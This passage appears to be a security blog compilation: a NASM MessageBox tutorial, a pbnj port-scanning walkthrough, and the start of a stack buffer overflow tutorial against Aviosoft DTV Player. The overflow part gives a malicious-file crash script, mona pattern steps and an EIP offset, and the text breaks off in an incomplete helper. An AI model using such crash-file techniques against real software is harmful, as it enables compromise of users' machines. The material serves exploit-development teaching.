(N)ASM Windows MessageBox, import dll

The site has moved to the root domain, where all posts are imported. Please go to http://pusheax.com/

Mostly I use NASM, GCC and LD for programming practice, because I use Linux as my primary operating system and I like to use cross-platform tools.

I am not an assembly coder; in the past I searched a lot for a NASM example of the MessageBox() function just to get started, because everything was fairly new to me (I had no clue!). So I decided to post a simple example, which was my first assembly program for Windows, in case someone is looking for a basic example to get started. I hope it will be useful to someone in the same situation as I was!

First Example:

extern _ExitProcess@4        ; kernel32: ExitProcess(UINT uExitCode), 1 dword argument
extern _MessageBoxA@16       ; user32: MessageBoxA(HWND, LPCSTR, LPCSTR, UINT), 4 dword arguments

global _main

section .data
msgb  db "pusheax.com!",0
title db "Security Research!",0

section .text

_main:

push dword 0x00              ; uType = MB_OK
;mov esi,msgb
;push esi
push dword title             ; lpCaption
push dword msgb              ; lpText
push dword 0                 ; hWnd = NULL
call _MessageBoxA@16         ; stdcall: the callee removes the 16 bytes of arguments

push 0                       ; uExitCode
call _ExitProcess@4

“extern” imports a symbol from another module. In our case the symbols are _ExitProcess@4 and _MessageBoxA@16. There are two things to notice:

1. The underscore before MessageBoxA.
2. The @4 / @16 suffix.

The underscore is the name decoration that 32-bit Windows compilers apply to C-callable functions (Linux ELF objects do not add it). The @N suffix is stdcall decoration: N is the total size in bytes of the parameters, which the called function removes from the stack before returning. MessageBox has 4 parameters of 4 bytes each, so (4*4) = 16 bytes, hence @16; ExitProcess has one 4-byte parameter, hence @4. The trailing “A” selects the ANSI (8-bit char) variant of the API; the “W” variant takes UTF-16 strings.

“global _main” makes the symbol visible to the linker; the C runtime start-up code that gcc links in calls _main, so this is where our instructions start (C style).

“section .data” holds initialised data, such as our two strings (uninitialised storage would go in section .bss).

In “section .text” (our code) all parameters are pushed onto the stack in reverse order. I am calling MessageBox (see here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505%28v=vs.85%29.aspx ). In C the call looks like this:

MessageBox(NULL,msgb,title,0x00000000L)

In assembly the order is reversed:

First push 0x00000000L (MB_OK) onto the stack. It is now the top of the stack!
Then push “title”. “title” is now the top of the stack.
Then push “msgb”. Same as above; “msgb” (the string) is on top.
The last push is 0 (the NULL hWnd). Same as above.
Finally call the function.

The stack is LIFO (last in, first out), so the callee sees the arguments in their declared order, exactly as the C call expresses it:

MessageBox(NULL,msgb,title,0x00000000L)

It is always a good idea to terminate the current process cleanly, so ExitProcess() is called once MessageBox() returns.

Assemble and link the code:
nasm -fwin32 msg.asm
gcc msg.obj -o msg.exe

But I want to import a specific DLL, because not every DLL is loaded by default and some API functions will not work if my code does not load their DLL. How do I do this? “import MessageBoxA@16 user32.dll”? NASM's import directive only exists in its OMF output format (nasm -fobj msg.asm), not in the -fwin32 COFF object I used above, and gcc/ld will not link an OMF object. So for this one I used ALINK (download: http://alink.sourceforge.net/) instead of gcc/LD; with ld you would instead link the DLL's import library with -l (see below). Here is the code I assembled with nasm and linked with alink.exe:

import MessageBoxA user32.dll   ; import the symbol from user32.dll
import ExitProcess kernel32.dll ; and ExitProcess from kernel32.dll, to end the process cleanly
extern MessageBoxA              ; external symbols, this time without underscore or @N
extern ExitProcess

section .data
msgme db "Hi",0                 ; say "Hi" to pusheax.com

section .text use32 CLASS=CODE  ; tell the other linker (alink.exe) that this is 32-bit code

..start:                        ; ..start (not _start) is the entry-point label for the obj format

push dword 0x00                 ; uType = MB_OK
mov esi,msgme                   ; esi -> "Hi"
push esi                        ; lpCaption (title) = "Hi"
push dword msgme                ; lpText = "Hi"
push dword 0                    ; hWnd = NULL
call [MessageBoxA]              ; indirect call through the import table entry

push dword 0                    ; uExitCode
call [ExitProcess]

;nasm -fobj msg2.asm
;alink -oPE msg2.obj

If we use ld (with gcc) the command is ld -o what.exe what.obj -luser32 (the -l option links the import library for the DLL), whereas for alink it is alink -oPE what.obj. With alink we do not have to write the decorated name (underscore, parameter byte count), while for ld we need all of that plus the extra “-l” option to link the DLL.

Which Linker you will use?
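Both routes above differ only in the symbol spelling and in how the call is written, while the push order and the @N arithmetic are mechanical. As an added example (my helper, not code from the original post), the Python script below derives all of it from the C prototype as MSDN prints it: it assumes every parameter is a 4-byte dword, which holds for the x86 Win32 API, and reuses the post's own labels msgb and title as the NASM operands.

```python
# Added example (not from the original post): generate the NASM scaffolding for
# a 32-bit Win32 stdcall API call from its C prototype, for both linking routes
# the post uses (-fwin32 with gcc/ld, -fobj with alink). Assumes every parameter
# is a 4-byte dword, which holds for the x86 Win32 API. Parameter names come
# from the MSDN prototype; the operand labels (msgb, title) are the post's own.
import re

PROTO_RE = re.compile(
    r"^\s*(?P<ret>[\w\s\*]+?)\s+(?P<name>\w+)\s*\((?P<params>.*)\)\s*;?\s*$")


def parse_prototype(proto):
    """Return (function name, [parameter names]) from a C-style prototype.
    An empty list or 'void' means no parameters."""
    m = PROTO_RE.match(proto)
    if not m:
        raise ValueError("cannot parse prototype: %r" % proto)
    params = m.group("params").strip()
    if params in ("", "void"):
        return m.group("name"), []
    # the last token of each declaration is the parameter name ("LPCSTR lpText")
    return m.group("name"), [p.strip().split()[-1].lstrip("*") for p in params.split(",")]


def stdcall_symbol(name, nparams, dword=4):
    """Decorated stdcall name as a COFF (-fwin32) link wants it: leading
    underscore, '@', total size of the arguments the callee pops on return."""
    return "_%s@%d" % (name, nparams * dword)


def emit_declarations(protos, fmt="win32"):
    """extern lines (-fwin32) or import+extern lines (-fobj/alink) for each
    (prototype, dll) pair."""
    out = []
    for proto, dll in protos:
        name, params = parse_prototype(proto)
        if fmt == "win32":
            out.append("extern %s" % stdcall_symbol(name, len(params)))
        elif fmt == "obj":
            out.append("import %s %s" % (name, dll))
            out.append("extern %s" % name)
        else:
            raise ValueError("fmt must be 'win32' or 'obj'")
    return out


def emit_call(proto, args, fmt="win32"):
    """NASM lines that call `proto` with `args` (one NASM operand per parameter).
    stdcall pushes right-to-left, so the first parameter is at [esp] when
    `call` executes: the push list is simply the prototype reversed."""
    name, params = parse_prototype(proto)
    if len(args) != len(params):
        raise ValueError("%s takes %d arguments, got %d" % (name, len(params), len(args)))
    lines = ["push dword %-12s ; %s" % (arg, pname)
             for pname, arg in reversed(list(zip(params, args)))]
    if fmt == "win32":
        lines.append("call %s" % stdcall_symbol(name, len(params)))
    elif fmt == "obj":
        lines.append("call [%s]" % name)   # indirect through the import table entry
    else:
        raise ValueError("fmt must be 'win32' or 'obj'")
    return lines


MESSAGEBOXA = "int WINAPI MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)"
EXITPROCESS = "void WINAPI ExitProcess(UINT uExitCode)"

if __name__ == "__main__":
    for fmt in ("win32", "obj"):
        print("; --- nasm -f%s ---" % fmt)
        print("\n".join(emit_declarations([(MESSAGEBOXA, "user32.dll"),
                                           (EXITPROCESS, "kernel32.dll")], fmt)))
        print("\n".join(emit_call(MESSAGEBOXA, ["0", "msgb", "title", "0x00"], fmt)))
        print("\n".join(emit_call(EXITPROCESS, ["0"], fmt)))
        print()
```

Running it prints the same five push/call lines as the two listings above, once with `call _MessageBoxA@16` and once with `call [MessageBoxA]`; the extern/import header changes accordingly. Because the generator counts parameters, the @N suffix can no longer be miscounted by hand.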

Port scanning using pbnj!


Recently I installed Kali Linux on VMware Workstation. There is a tool called pbnj which can scan ports and store the results in a MySQL database; storing assessment results in a database is sometimes useful. In Kali Linux it is not installed by default. pbnj drives nmap (nmap options are passed with “-a [options]”) to scan the network; I only use it to store the results in the database!

Let's see how to install it, scan ports and store the results in the database.

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start mysql services on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..


Let’s find all file related of pbnj :

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums



I am going to use MySQL, so I am only interested in “/usr/share/doc/pbnj/examples/mysql.yaml”. We copy it to pbnj's config directory and edit it with the correct username, password and database:
root@find:~# mkdir -p ~/.pbnj-2.0; cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml
root@find:~# nano ~/.pbnj-2.0/config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd: ""
# Host for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali the MySQL root password is blank and the username is “root”. You should really change the username and password; I am doing it here without changing anything. So let's configure MySQL:
root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now Let’s scan port:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------


In the command above, the “-a” option passes the nmap argument “-sS” (TCP SYN scan). The scan finished and the results should have been written to the database. Let's check:

root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>

mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>

Another installed tool, outputpbnj, dumps the results without logging in to MySQL manually.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
/usr/share/man/man1/outputpbnj.1p.gz

root@find:~# outputpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Usage: outputpbnj [Query Options] [Config Options] [General Options]
Query Options:
-q --query <name> Perform sql query
-t --type <type> Output Type [csv,tab,html]
-f --file <filename> Store the result in file otherwise stdout
--both Print results and store them in a file
--dir <dir> Store the result in this directory [def .]

-l --lookup <name> Lookup descrition based on name
--list List of names and descriptions
-n --name Lookup all the names
-d --desc Lookup all the descriptions
-s --sql Lookup all the sql queries

Config Options:
--qconfig <file> Config of sql queries [def query.yaml]
--dbconfig <file> Config for accessing database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]

General Options:
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )


Okay, let's dump the latest results:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Error in option spec: "test|=s"
Error in option spec: "debug|=s"

wtf!

It is not working as expected. No problem, I am going to edit “outputpbnj” (a Perl script): the “|” has to be removed from the “test” and “debug” option specs. Kali Linux ships the Leafpad text editor, so “leafpad /usr/bin/outputpbnj” (or use gedit, or kate/kwrite on KDE), then search for “test|=s”:

GetOptions(
%options,
'type|t=s', 'file|f=s', 'lookup|l=s', 'both|b',
'query|q=s', 'names|n', 'desc|d', 'sql|s', 'list',
'dbconfig=s', 'configdir=s', 'dir=s', 'data=s', 'qconfig=s',
'test|=s', 'debug|=s',
'help|h' => sub { help(); },
'version|v' => sub { print_version(); },
'both' => sub { $bothOutput = 1 },
)
or exit 1;

Just remove the pipe “|” from “test” and “debug” so they read 'test=s', 'debug=s' (a “|” with nothing after it is an invalid Getopt::Long option spec, which is what the error message says). Now save and run:

root@find:~# outputpbnj -q latestinfo
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.
Tue Mar 26 19:12:23 2013 localhost mysql up unknown versiontcp
Tue Mar 26 19:12:23 2013 localhost postgresql up unknown version tcp


It is possible to save the output in different formats. For example:

root@find:~# mkdir pbnjr
root@find:~# outputpbnj -q latestinfo -t html -f pbnjr/report.html
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/outputpbnj, line 27.

root@find:~# cd pbnjr
root@find:~/pbnjr# ls
report.html
root@find:~/pbnjr# iceweasel report.html
root@find:~/pbnjr#

Another curiosity: can I use only one query (“-q”) or are there more? There are many:

possiblevuln
sshmachines
allservices
services
unknown_version_up
unknown_banner_up
machines
mdump
servicesup
service_audit 

All the query names are available in the outputpbnj script (with descriptions)!

These kinds of tools are really useful for vulnerability assessment. pbnj is a nice tool.
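The point of keeping scan results in a database (pbnj's package description says it: "monitor changes on a network") is to ask what changed between two scans, which the manual mysql session above does not show. As an added example, not part of pbnj or the original post, the script below does in plain Python what scanpbnj -x and the database do: it parses nmap XML, fills the two tables shown above (machines, services; columns trimmed to the ones needed) and reports which services appeared or disappeared for a host between two scans. It uses sqlite3 in memory instead of MySQL (pbnj ships a sqlite3.yaml example too), and the two nmap XML documents and the timestamps are constructed for this example.

```python
# Added example, not part of pbnj or the original post. Parse nmap XML output,
# store it in the two tables pbnj uses (machines, services; trimmed to the
# columns this needs) and answer the question pbnj exists for: which services
# appeared or disappeared between two scans of a host. sqlite3 in memory
# replaces MySQL; the two XML documents below are constructed for the example.
import sqlite3
import xml.etree.ElementTree as ET

SCHEMA = """
CREATE TABLE machines (mid INTEGER PRIMARY KEY, ip TEXT UNIQUE, host TEXT,
                       localh INTEGER, os TEXT, machine_created INTEGER);
CREATE TABLE services (mid INTEGER, service TEXT, state TEXT, port INTEGER,
                       protocol TEXT, version TEXT, banner TEXT,
                       machine_updated INTEGER);
"""

# Constructed nmap -oX output: two scans of localhost, an hour apart.
SCAN_OLD = """<nmaprun><host><status state="up"/>
  <address addr="127.0.0.1" addrtype="ipv4"/>
  <hostnames><hostname name="localhost"/></hostnames>
  <ports>
    <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
    <port protocol="tcp" portid="5432"><state state="open"/><service name="postgresql"/></port>
  </ports></host></nmaprun>"""
SCAN_NEW = """<nmaprun><host><status state="up"/>
  <address addr="127.0.0.1" addrtype="ipv4"/>
  <hostnames><hostname name="localhost"/></hostnames>
  <ports>
    <port protocol="tcp" portid="3306"><state state="open"/>
      <service name="mysql" product="MySQL" version="5.5.28-1"/></port>
    <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
  </ports></host></nmaprun>"""


def parse_nmap_xml(xml_text):
    """Yield (ip, hostname, [(port, proto, state, service, product, version)]) per host."""
    for host in ET.fromstring(xml_text).iter("host"):
        ip = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else "0"   # pbnj stores 0 when unresolved
        ports = []
        for p in host.iter("port"):
            svc = p.find("service")
            ports.append((int(p.get("portid")), p.get("protocol"), p.find("state").get("state"),
                          svc.get("name", "unknown") if svc is not None else "unknown",
                          svc.get("product", "unknown product") if svc is not None else "unknown product",
                          svc.get("version", "unknown version") if svc is not None else "unknown version"))
        yield ip, hostname, ports


def store_scan(conn, xml_text, scanned_at):
    """Insert one scan; returns the number of service rows written.
    nmap's 'open' becomes pbnj's 'up', as in the services table above."""
    cur = conn.cursor()
    rows = 0
    for ip, hostname, ports in parse_nmap_xml(xml_text):
        cur.execute("INSERT OR IGNORE INTO machines (ip, host, localh, os, machine_created) "
                    "VALUES (?, ?, ?, 'unknown os', ?)",
                    (ip, hostname, 1 if ip.startswith("127.") else 0, scanned_at))
        (mid,) = cur.execute("SELECT mid FROM machines WHERE ip = ?", (ip,)).fetchone()
        for port, proto, state, name, product, version in ports:
            cur.execute("INSERT INTO services VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
                        (mid, name, "up" if state == "open" else "down", port, proto,
                         version, product, scanned_at))
            rows += 1
    conn.commit()
    return rows


def service_changes(conn, ip, t_old, t_new):
    """(port, protocol) pairs that are up at t_new but not at t_old, and the reverse."""
    q = """SELECT s.port, s.protocol FROM services s JOIN machines m ON m.mid = s.mid
           WHERE m.ip = ? AND s.state = 'up' AND s.machine_updated = ?"""
    old = set(conn.execute(q, (ip, t_old)).fetchall())
    new = set(conn.execute(q, (ip, t_new)).fetchall())
    return {"new": sorted(new - old), "closed": sorted(old - new)}


def demo():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    t_old, t_new = 1364339543, 1364339543 + 3600   # constructed epoch timestamps
    store_scan(conn, SCAN_OLD, t_old)
    store_scan(conn, SCAN_NEW, t_new)
    return service_changes(conn, "127.0.0.1", t_old, t_new)


if __name__ == "__main__":
    print(demo())   # {'new': [(22, 'tcp')], 'closed': [(5432, 'tcp')]}
```

The same query, with two machine_updated values substituted, is what you would write for outputpbnj's query.yaml to get the change report without the Python wrapper.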

Exploit writing – Stack-based buffer overflow


There are many exploit-writing tutorials, but Corelan's exploit writing tutorials are much, much better. If you want to learn exploit development, you may want to get started with Corelan too. Anyway,

Today I tried to exploit an application found at http://www.exploit-db.com/exploits/22932/ (the exploit script there did not work for me). Exploiting the vulnerability was very easy, but finding the bad chars was a bit tricky. I was able to find all the bad chars using Corelan's mona.py and exploited the application successfully. I used the following tools to develop the exploit:

1. VMware Workstation.

2. Python.

3. Immunity Debugger.

4. mona.py (copy mona.py to “C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands”).

5. Windows XP SP3 and Windows 7.

6. Metasploit.

If you are going to build this exploit yourself you will also need the tools above, so download them as your preparation.

I downloaded the vulnerable application first and installed it on the Windows XP SP3 VM.

CRASH AND LENGTH OF BUFFER

The simple crash script was:

print "Creating exploit."
f=open("crash-me.PLF","w")
push="A" * 2000

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

It creates a file “crash-me.PLF”. If I open the file in Aviosoft DTV Player it just crashes. Well, let's attach Immunity Debugger to see what is happening.

Click Debug >> Run.

Now let's open “crash-me.PLF”:

So it finally crashed, and I saw that the ESP and EIP registers contain “AAAAAAAA…”:

This clearly indicates that I control EIP, which means the crash is really exploitable (explained later!). Now it is time to find how many bytes are needed to reach and overwrite EIP. Time to work with a great tool, mona.py. There was an old, awkward way to do this, but now we can do it very easily with Metasploit or mona.py. We already know the application crashed when we sent 2000 bytes of junk, so we will create a cyclic pattern of that length using mona.

First I set the default working folder for mona:

!mona config -set workingfolder c:\mona\%p

Then the mona command is:

!mona pattern_create 2000

It creates a file called “pattern.txt” in C:\mona\AviosoftDTV. Now I need to edit the script again and put the cyclic pattern in place of the “A”s. The full script looks like this:

print "Creating exploit."
f=open("crash-me.PLF","w")
push="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co" # 2000-byte cyclic pattern from !mona pattern_create 2000

try:
    f.write(push)
    f.close()
    print "File created"
except:
    print "File cannot be created"

(The “A”*2000 has been replaced with the pattern generated by mona.)

Now regenerate “crash-me.PLF” and open it with Aviosoft DTV (already attached to the debugger). The application crashes again, this time with mona's cyclic pattern instead of “AAAAAA…”, so I take note of the EIP value. In my case it is “37694136”:

Now we need to figure out exactly how many bytes it takes to overwrite EIP. For this mona is enough:

!mona pattern_offset 37694136

It tells us that 260 bytes fill the buffer up to the saved return address, and the next 4 bytes overwrite EIP, so 260+4 = 264 bytes.
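What mona does in pattern_offset is worth seeing once in the open, because the little-endian step is where people go wrong by hand. The script below is an added example, not from the original post or from mona: a pure-Python equivalent of pattern_create / pattern_offset (the same scheme Metasploit's pattern_create.rb uses) that derives the 260 above from the EIP value 37694136 the debugger displayed.

```python
# Added example, not from the original post: a pure-Python equivalent of
# !mona pattern_create / pattern_offset (the same scheme Metasploit's
# pattern_create.rb uses), showing how the offset 260 falls out of the EIP
# value 37694136 that the debugger displayed. No mona or Metasploit needed.
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...Az9Ba0...: each upper/lower/digit triple occurs
    once, so any 4-byte window is unique within the first 20280 bytes."""
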